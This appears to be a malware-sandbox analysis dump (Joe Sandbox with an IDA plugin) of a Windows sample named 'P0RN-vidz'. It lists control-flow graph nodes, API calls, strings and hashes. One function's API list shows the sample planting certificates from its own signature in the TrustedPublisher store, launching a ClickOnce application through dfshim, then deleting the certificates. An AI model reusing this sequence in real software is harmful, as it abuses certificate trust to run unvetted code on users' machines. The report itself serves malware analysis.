6803 3749b9 _free 15 API calls 6805 373f14 6803->6805 6804->6806 6807 3749b9 _free 15 API calls 6805->6807 6806->6803 6808 
373f27 6807->6808 6809 3749b9 _free 15 API calls 6808->6809 6810 373f38 6809->6810 6811 3749b9 _free 15 API calls 6810->6811 6812 373f49 6811->6812 5921 37571e GetCommandLineA GetCommandLineW 6700 37339d 6701 37537b 46 API calls 6700->6701 6702 3733af 6701->6702 6711 37576e GetEnvironmentStringsW 6702->6711 6706 3749b9 _free 15 API calls 6708 3733ef 6706->6708 6707 3733c5 6709 3749b9 _free 15 API calls 6707->6709 6710 3733ba 6709->6710 6710->6706 6712 375785 6711->6712 6722 3757d8 6711->6722 6715 37578b WideCharToMultiByte 6712->6715 6713 3757e1 FreeEnvironmentStringsW 6714 3733b4 6713->6714 6714->6710 6723 3733f5 6714->6723 6716 3757a7 6715->6716 6715->6722 6717 37644f 16 API calls 6716->6717 6718 3757ad 6717->6718 6719 3757b4 WideCharToMultiByte 6718->6719 6720 3757ca 6718->6720 6719->6720 6721 3749b9 _free 15 API calls 6720->6721 6721->6722 6722->6713 6722->6714 6724 37340a 6723->6724 6725 37495c _abort 15 API calls 6724->6725 6735 373431 6725->6735 6726 373495 6727 3749b9 _free 15 API calls 6726->6727 6728 3734af 6727->6728 6728->6707 6729 37495c _abort 15 API calls 6729->6735 6730 373497 6732 3734c6 15 API calls 6730->6732 6733 37349d 6732->6733 6736 3749b9 _free 15 API calls 6733->6736 6734 3734b9 6737 37489d _abort 6 API calls 6734->6737 6735->6726 6735->6729 6735->6730 6735->6734 6738 3749b9 _free 15 API calls 6735->6738 6740 37401a 6735->6740 6736->6726 6739 3734c5 6737->6739 6738->6735 6741 374027 6740->6741 6742 374035 6740->6742 6741->6742 6744 37404c 6741->6744 6743 374949 _free 15 API calls 6742->6743 6748 37403d 6743->6748 6746 374047 6744->6746 6747 374949 _free 15 API calls 6744->6747 6745 37488d _abort 21 API calls 6745->6746 6746->6735 6747->6748 6748->6745 6813 374dda 6818 374e0f 6813->6818 6816 374df6 6817 3749b9 _free 15 API calls 6817->6816 6819 374e21 6818->6819 6823 374de8 6818->6823 6820 374e26 6819->6820 6821 374e51 6819->6821 6822 37495c _abort 15 API calls 6820->6822 6821->6823 6825 37696b 24 API calls 6821->6825 6824 374e2f 6822->6824 
6823->6816 6823->6817 6826 3749b9 _free 15 API calls 6824->6826 6827 374e6c 6825->6827 6826->6823 6828 3749b9 _free 15 API calls 6827->6828 6828->6823 5922 374005 5923 374008 5922->5923 5924 374074 _abort 33 API calls 5923->5924 5925 374014 5924->5925 6422 372144 6425 372192 6422->6425 6426 37214f 6425->6426 6427 37219b 6425->6427 6427->6426 6434 372513 6427->6434 6430 372513 43 API calls 6431 3721e1 6430->6431 6448 373fd9 6431->6448 6454 372521 6434->6454 6436 372518 6437 3721d6 6436->6437 6438 376c64 _abort 2 API calls 6436->6438 6437->6430 6439 374079 6438->6439 6440 374085 6439->6440 6441 376cbf _abort 33 API calls 6439->6441 6442 3740ac 6440->6442 6443 37408e IsProcessorFeaturePresent 6440->6443 6441->6440 6444 3738e3 _abort 23 API calls 6442->6444 6445 374099 6443->6445 6447 3740b6 6444->6447 6446 3746c3 _abort 3 API calls 6445->6446 6446->6442 6449 373fe5 _abort 6448->6449 6450 374574 _abort 33 API calls 6449->6450 6453 373fea 6450->6453 6451 374074 _abort 33 API calls 6452 374014 6451->6452 6453->6451 6455 37252d GetLastError 6454->6455 6456 37252a 6454->6456 6466 3727f4 6455->6466 6456->6436 6459 3725a7 SetLastError 6459->6436 6460 37282f ___vcrt_FlsSetValue 6 API calls 6461 37255b 6460->6461 6462 372583 6461->6462 6463 37282f ___vcrt_FlsSetValue 6 API calls 6461->6463 6465 372561 6461->6465 6464 37282f ___vcrt_FlsSetValue 6 API calls 6462->6464 6462->6465 6463->6462 6464->6465 6465->6459 6467 372693 ___vcrt_FlsFree 5 API calls 6466->6467 6468 37280e 6467->6468 6469 372826 TlsGetValue 6468->6469 6470 372542 6468->6470 6469->6470 6470->6459 6470->6460 6470->6465 6471 371442 6472 371a6b GetModuleHandleW 6471->6472 6473 37144a 6472->6473 6474 371480 6473->6474 6475 37144e 6473->6475 6477 3738e3 _abort 23 API calls 6474->6477 6476 371459 6475->6476 6480 3738c5 6475->6480 6479 371488 6477->6479 6481 3736ae _abort 23 API calls 6480->6481 6482 3738d0 6481->6482 6482->6476 6483 378f41 6484 378f65 6483->6484 6485 378fb6 6484->6485 6488 379041 
__startOneArgErrorHandling 6484->6488 6489 378fc8 6485->6489 6491 379b23 6485->6491 6487 379d7d __startOneArgErrorHandling 6488->6487 6490 37a314 16 API calls 6488->6490 6490->6487 6492 379b40 DecodePointer 6491->6492 6493 379b50 6491->6493 6492->6493 6494 379bdd 6493->6494 6495 379bd2 _ValidateLocalCookies 6493->6495 6497 379b87 6493->6497 6494->6495 6496 374949 _free 15 API calls 6494->6496 6495->6489 6496->6495 6497->6495 6498 374949 _free 15 API calls 6497->6498 6498->6495 6829 3776c0 6830 3776f9 6829->6830 6831 374949 _free 15 API calls 6830->6831 6832 377725 _ValidateLocalCookies 6830->6832 6833 377702 6831->6833 6834 37488d _abort 21 API calls 6833->6834 6835 37770d _ValidateLocalCookies 6834->6835 6749 37398f 6750 37399b ___scrt_is_nonwritable_in_current_image 6749->6750 6751 3739d2 _abort 6750->6751 6757 375832 EnterCriticalSection 6750->6757 6753 3739af 6754 37691b __fassign 15 API calls 6753->6754 6755 3739bf 6754->6755 6758 3739d8 6755->6758 6757->6753 6761 37587a LeaveCriticalSection 6758->6761 6760 3739df 6760->6751 6761->6760 5056 37130d 5057 371319 ___scrt_is_nonwritable_in_current_image 5056->5057 5084 37162c 5057->5084 5059 371320 5060 371473 5059->5060 5071 37134a ___scrt_is_nonwritable_in_current_image _abort ___scrt_release_startup_lock 5059->5071 5137 371920 IsProcessorFeaturePresent 5060->5137 5062 37147a 5063 371480 5062->5063 5141 373931 5062->5141 5144 3738e3 5063->5144 5067 371369 5071->5067 5075 3713ea 5071->5075 5121 3738f9 5071->5121 5092 371a35 5075->5092 5076 371405 5128 371a6b GetModuleHandleW 5076->5128 5079 371410 5080 371419 5079->5080 5130 3738d4 5079->5130 5133 37179d 5080->5133 5085 371635 5084->5085 5147 371bd4 IsProcessorFeaturePresent 5085->5147 5089 371646 5090 37164a 5089->5090 5157 3720cd 5089->5157 5090->5059 5217 372200 5092->5217 5095 3713f0 5096 3735a7 5095->5096 5219 37537b 5096->5219 5098 3735b0 5100 3713f8 5098->5100 5223 375706 5098->5223 5101 371000 6 API calls 5100->5101 5102 371096 CryptMsgGetParam 5101->5102 
5103 3711e3 Sleep 5101->5103 5104 371162 CryptMsgGetParam 5102->5104 5105 3710bc LocalAlloc 5102->5105 5106 371215 CertCloseStore LocalFree LocalFree LocalFree 5103->5106 5112 3711f7 5103->5112 5104->5103 5107 371174 CryptMsgGetParam 5104->5107 5108 3710d7 5105->5108 5109 371156 LocalFree 5105->5109 5106->5076 5107->5103 5110 371188 CertFindAttribute CertFindAttribute 5107->5110 5111 3710e0 LocalAlloc CryptMsgGetParam 5108->5111 5109->5104 5114 3711b5 LoadLibraryA GetProcAddress 5110->5114 5115 3711b1 5110->5115 5116 371114 CertCreateCertificateContext 5111->5116 5117 37113d LocalFree 5111->5117 5112->5106 5113 37120a CertDeleteCertificateFromStore 5112->5113 5113->5112 5114->5103 5115->5103 5115->5114 5119 371126 CertAddCertificateContextToStore 5116->5119 5120 371133 CertFreeCertificateContext 5116->5120 5117->5111 5118 37114d 5117->5118 5118->5109 5119->5120 5120->5117 5122 373921 _abort 5121->5122 5123 373fd9 _abort 5121->5123 5122->5075 5124 374574 _abort 33 API calls 5123->5124 5127 373fea 5124->5127 5125 374074 _abort 33 API calls 5126 374014 5125->5126 5127->5125 5129 37140c 5128->5129 5129->5062 5129->5079 5711 3736ae 5130->5711 5132 3738df 5132->5080 5134 3717a9 ___scrt_uninitialize_crt 5133->5134 5135 371421 5134->5135 5136 3720cd ___scrt_uninitialize_crt 7 API calls 5134->5136 5135->5067 5136->5135 5138 371936 _abort 5137->5138 5139 3719e1 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5138->5139 5140 371a25 _abort 5139->5140 5140->5062 5142 3736ae _abort 23 API calls 5141->5142 5143 373942 5142->5143 5143->5063 5145 3736ae _abort 23 API calls 5144->5145 5146 371488 5145->5146 5148 371641 5147->5148 5149 3720ae 5148->5149 5163 372601 5149->5163 5152 3720b7 5152->5089 5154 3720bf 5155 3720ca 5154->5155 5177 37263d 5154->5177 5155->5089 5158 3720d6 5157->5158 5159 3720e0 5157->5159 5160 3725e6 ___vcrt_uninitialize_ptd 6 API calls 5158->5160 5159->5090 5161 3720db 5160->5161 5162 37263d ___vcrt_uninitialize_locks 
DeleteCriticalSection 5161->5162 5162->5159 5164 37260a 5163->5164 5166 372633 5164->5166 5167 3720b3 5164->5167 5181 37286d 5164->5181 5168 37263d ___vcrt_uninitialize_locks DeleteCriticalSection 5166->5168 5167->5152 5169 3725b3 5167->5169 5168->5167 5198 37277e 5169->5198 5173 3725e3 5173->5154 5176 3725c8 5176->5154 5178 372667 5177->5178 5179 372648 5177->5179 5178->5152 5180 372652 DeleteCriticalSection 5179->5180 5180->5178 5180->5180 5186 372693 5181->5186 5184 3728a5 InitializeCriticalSectionAndSpinCount 5185 372890 5184->5185 5185->5164 5187 3726b4 5186->5187 5188 3726b0 5186->5188 5187->5188 5190 37271c GetProcAddress 5187->5190 5191 37270d 5187->5191 5193 372733 LoadLibraryExW 5187->5193 5188->5184 5188->5185 5190->5188 5191->5190 5192 372715 FreeLibrary 5191->5192 5192->5190 5194 37274a GetLastError 5193->5194 5196 37277a 5193->5196 5195 372755 ___vcrt_FlsFree 5194->5195 5194->5196 5195->5196 5197 37276b LoadLibraryExW 5195->5197 5196->5187 5197->5187 5199 372693 ___vcrt_FlsFree 5 API calls 5198->5199 5200 372798 5199->5200 5201 3727b1 TlsAlloc 5200->5201 5202 3725bd 5200->5202 5202->5176 5203 37282f 5202->5203 5204 372693 ___vcrt_FlsFree 5 API calls 5203->5204 5205 372849 5204->5205 5206 372864 TlsSetValue 5205->5206 5207 3725d6 5205->5207 5206->5207 5207->5173 5208 3725e6 5207->5208 5209 3725f0 5208->5209 5210 3725f6 5208->5210 5212 3727b9 5209->5212 5210->5176 5213 372693 ___vcrt_FlsFree 5 API calls 5212->5213 5214 3727d3 5213->5214 5215 3727eb TlsFree 5214->5215 5216 3727df 5214->5216 5215->5216 5216->5210 5218 371a48 GetStartupInfoW 5217->5218 5218->5095 5220 37538d 5219->5220 5221 375384 5219->5221 5220->5098 5226 37527a 5221->5226 5708 3756ad 5223->5708 5246 374574 GetLastError 5226->5246 5228 375287 5266 375399 5228->5266 5230 37528f 5275 37500e 5230->5275 5233 3752a6 5233->5220 5236 3752e9 5300 3749b9 5236->5300 5238 3752dc 5240 3752e4 5238->5240 5243 375301 5238->5243 5297 374949 5240->5297 5242 37532d 5242->5236 5306 374ee4 5242->5306 
5243->5242 5244 3749b9 _free 15 API calls 5243->5244 5244->5242 5247 374590 5246->5247 5248 37458a 5246->5248 5252 3745df SetLastError 5247->5252 5314 37495c 5247->5314 5309 375a54 5248->5309 5252->5228 5254 3749b9 _free 15 API calls 5256 3745b0 5254->5256 5255 3745bf 5257 3745c6 5255->5257 5258 3745aa 5255->5258 5260 3745eb SetLastError 5256->5260 5326 3743e6 5257->5326 5258->5254 5331 374074 5260->5331 5263 3749b9 _free 15 API calls 5265 3745d8 5263->5265 5265->5252 5265->5260 5267 3753a5 ___scrt_is_nonwritable_in_current_image 5266->5267 5268 374574 _abort 33 API calls 5267->5268 5273 3753af 5268->5273 5270 375433 _abort 5270->5230 5272 374074 _abort 33 API calls 5272->5273 5273->5270 5273->5272 5274 3749b9 _free 15 API calls 5273->5274 5567 375832 EnterCriticalSection 5273->5567 5568 37542a 5273->5568 5274->5273 5572 3740c2 5275->5572 5278 375041 5280 375058 5278->5280 5281 375046 GetACP 5278->5281 5279 37502f GetOEMCP 5279->5280 5280->5233 5282 37644f 5280->5282 5281->5280 5283 37648d 5282->5283 5287 37645d _abort 5282->5287 5284 374949 _free 15 API calls 5283->5284 5286 3752b7 5284->5286 5285 376478 HeapAlloc 5285->5286 5285->5287 5286->5236 5289 37543b 5286->5289 5287->5283 5287->5285 5288 376ae2 _abort 2 API calls 5287->5288 5288->5287 5290 37500e 35 API calls 5289->5290 5291 37545a 5290->5291 5292 3754ab IsValidCodePage 5291->5292 5294 375461 _ValidateLocalCookies 5291->5294 5296 3754d0 _abort 5291->5296 5293 3754bd GetCPInfo 5292->5293 5292->5294 5293->5294 5293->5296 5294->5238 5609 3750e6 GetCPInfo 5296->5609 5298 3745f8 _free 15 API calls 5297->5298 5299 37494e 5298->5299 5299->5236 5301 3749c4 HeapFree 5300->5301 5302 3749ed _free 5300->5302 5301->5302 5303 3749d9 5301->5303 5302->5233 5304 374949 _free 13 API calls 5303->5304 5305 3749df GetLastError 5304->5305 5305->5302 5672 374ea1 5306->5672 5308 374f08 5308->5236 5342 375891 5309->5342 5311 375a7b 5312 375a93 TlsGetValue 5311->5312 5313 375a87 _ValidateLocalCookies 5311->5313 5312->5313 
5313->5247 5320 374969 _abort 5314->5320 5315 3749a9 5317 374949 _free 14 API calls 5315->5317 5316 374994 HeapAlloc 5318 3745a2 5316->5318 5316->5320 5317->5318 5318->5258 5321 375aaa 5318->5321 5320->5315 5320->5316 5355 376ae2 5320->5355 5322 375891 _abort 5 API calls 5321->5322 5323 375ad1 5322->5323 5324 375aec TlsSetValue 5323->5324 5325 375ae0 _ValidateLocalCookies 5323->5325 5324->5325 5325->5255 5369 3743be 5326->5369 5477 376c64 5331->5477 5334 374085 5336 37408e IsProcessorFeaturePresent 5334->5336 5341 3740ac 5334->5341 5338 374099 5336->5338 5337 3738e3 _abort 23 API calls 5340 3740b6 5337->5340 5505 3746c3 5338->5505 5341->5337 5345 3758bd 5342->5345 5347 3758c1 _abort 5342->5347 5343 3758e1 5346 3758ed GetProcAddress 5343->5346 5343->5347 5345->5343 5345->5347 5348 37592d 5345->5348 5346->5347 5347->5311 5349 37594e LoadLibraryExW 5348->5349 5350 375943 5348->5350 5351 375983 5349->5351 5352 37596b GetLastError 5349->5352 5350->5345 5351->5350 5354 37599a FreeLibrary 5351->5354 5352->5351 5353 375976 LoadLibraryExW 5352->5353 5353->5351 5354->5350 5358 376b26 5355->5358 5357 376af8 _ValidateLocalCookies 5357->5320 5359 376b32 ___scrt_is_nonwritable_in_current_image 5358->5359 5364 375832 EnterCriticalSection 5359->5364 5361 376b3d 5365 376b6f 5361->5365 5363 376b64 _abort 5363->5357 5364->5361 5368 37587a LeaveCriticalSection 5365->5368 5367 376b76 5367->5363 5368->5367 5375 3742fe 5369->5375 5371 3743e2 5372 37436e 5371->5372 5386 374202 5372->5386 5374 374392 5374->5263 5376 37430a ___scrt_is_nonwritable_in_current_image 5375->5376 5381 375832 EnterCriticalSection 5376->5381 5378 374314 5382 37433a 5378->5382 5380 374332 _abort 5380->5371 5381->5378 5385 37587a LeaveCriticalSection 5382->5385 5384 374344 5384->5380 5385->5384 5387 37420e ___scrt_is_nonwritable_in_current_image 5386->5387 5394 375832 EnterCriticalSection 5387->5394 5389 374218 5395 374529 5389->5395 5391 374230 5399 374246 5391->5399 5393 37423e _abort 5393->5374 5394->5389 5396 

Control-flow Graph

APIs
• LocalAlloc.KERNEL32(00000000,00000104), ref: 00371016
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00371025
• CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00371032
• LocalAlloc.KERNELBASE(00000000,00040000), ref: 00371057
• LocalAlloc.KERNEL32(00000000,00040000), ref: 00371063
• CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00371082
• CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 003710B2
• LocalAlloc.KERNEL32(00000000,?), ref: 003710C5
• LocalAlloc.KERNEL32(00000000,00002000), ref: 003710F4
• CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 0037110A
• CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 0037111A
• CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 0037112D
• CertFreeCertificateContext.CRYPT32(00000000), ref: 00371134
• LocalFree.KERNEL32(00000000), ref: 0037113E
• LocalFree.KERNEL32(00000000), ref: 0037115D
• CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 0037116E
• CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00371182
• CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00371198
• CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 003711A9
• LoadLibraryA.KERNELBASE(dfshim), ref: 003711BA
• GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 003711C6
• Sleep.KERNELBASE(00009C40), ref: 003711E8
• CertDeleteCertificateFromStore.CRYPT32(?), ref: 0037120B
• CertCloseStore.CRYPT32(?,00000000), ref: 0037121A
• LocalFree.KERNEL32(?), ref: 00371223
• LocalFree.KERNEL32(?), ref: 00371228
• LocalFree.KERNEL32(?), ref: 0037122D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
Similarity
• API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
• String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
• API String ID: 335784236-860318880
• Opcode ID: 5131c8094e1da74f9621551c506ed704ad73a0763b3952b2a2ef3a8f70828a10
• Instruction ID: 70f1c23fa54f1e3e54da7d68f061d00e1350de3fd3477ecd273b1563b85fc5f1
• Opcode Fuzzy Hash: 5131c8094e1da74f9621551c506ed704ad73a0763b3952b2a2ef3a8f70828a10
• Instruction Fuzzy Hash: 05616172A40218AFEB329B94DC49FAFBBB9FF48B50F114014F618B7190C7759941DBA4
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0037192C
• IsDebuggerPresent.KERNEL32 ref: 003719F8
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00371A11
• UnhandledExceptionFilter.KERNEL32(?), ref: 00371A1B
Memory Dump Source
• Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 9b41c37f8668421c833993fad24adba5a9ed3daf62ac45096ded57994ca196f6
• Instruction ID: 7c4574fe4b4e57ade8232a5366ff139e2df65ca111bf79a018281e88bbb4e184
• Opcode Fuzzy Hash: 9b41c37f8668421c833993fad24adba5a9ed3daf62ac45096ded57994ca196f6
• Instruction Fuzzy Hash: 1A310AB5D0521C9BDF21DFA4D9497CDBBB8AF08300F1041AAE50DAB250EB749B85CF45
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 003747BB
                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 003747C5
                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 003747D2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                          • Opcode ID: e3356dc70a3748ee4441f4c75a695bcbfd1071cb84cf98f65206b8bcd44900cf
                                                                                                                                                                                                                                          • Instruction ID: 2fab90c019423af6d7453234275119b9f3be30ab7717029df20cb85fe6a904f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3356dc70a3748ee4441f4c75a695bcbfd1071cb84cf98f65206b8bcd44900cf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9831C67590122CABCB22DF68DC89B8DB7B8BF08311F5081DAE41CA7251EB349F858F44
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,0037379D,?,003802F0,0000000C,003738F4,?,00000002,00000000,?,003740B6,00000003,003721EF,00371AFD), ref: 003737E8
                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0037379D,?,003802F0,0000000C,003738F4,?,00000002,00000000,?,003740B6,00000003,003721EF,00371AFD), ref: 003737EF
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00373801
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                          • Opcode ID: 2c5940d30c38438352e697c0cbd34943049dd59b6d6c286c3eabe061df6e155d
                                                                                                                                                                                                                                          • Instruction ID: 54eedf6877ef747118f8854647af2e968875758294f2430d3ea3bff47cc7e99b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c5940d30c38438352e697c0cbd34943049dd59b6d6c286c3eabe061df6e155d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6E012B1000248EBCB23AF54DD09B4A7B7DFF00351F008014F81D8A122EB39DA82DA40
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                          • API String ID: 0-248832578
                                                                                                                                                                                                                                          • Opcode ID: 802d375b4b73ef7019fa56da8dd41a1ffea8ed768c8dac352c77c3add15a143b
                                                                                                                                                                                                                                          • Instruction ID: f1a1149b790d062145d16b269f6a7173212e7b60d731167d71474f0a373c1a3e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 802d375b4b73ef7019fa56da8dd41a1ffea8ed768c8dac352c77c3add15a143b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A31F271900209BBCB369E78CC84EFB7BADEB85304F1581A8E95D87251E734AD448B50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0037A5E0,?,?,00000008,?,?,0037A280,00000000), ref: 0037A812
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                          • Opcode ID: c2345ca30669b6629b20e54b3c594ed3a521c16de614b756a2df1e48d9c7ebbd
                                                                                                                                                                                                                                          • Instruction ID: fe03d47a33880f3a513c72198298627db99b0654e041c97ac65b56c9cebf793d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2345ca30669b6629b20e54b3c594ed3a521c16de614b756a2df1e48d9c7ebbd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDB14F35510A08DFD72ACF28C486B597BE0FF45354F2AC658E899CF2A1C339D982CB41
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00371BEA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                                                                          • Opcode ID: 627aee5ed8bee0fe46869308b1a7e181345d51bac00058f6432dfa6153251a1a
                                                                                                                                                                                                                                          • Instruction ID: 7c4ad0f880481f37ec37d46b5a93e802322204e29b08478b21b35af67d4346b8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 627aee5ed8bee0fe46869308b1a7e181345d51bac00058f6432dfa6153251a1a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9A17DF2900385CFDB2ACF58DC816EDBBB9FB48310F25816AD819EB654D3389885CB50
                                                                                                                                                                                                                                          APIs
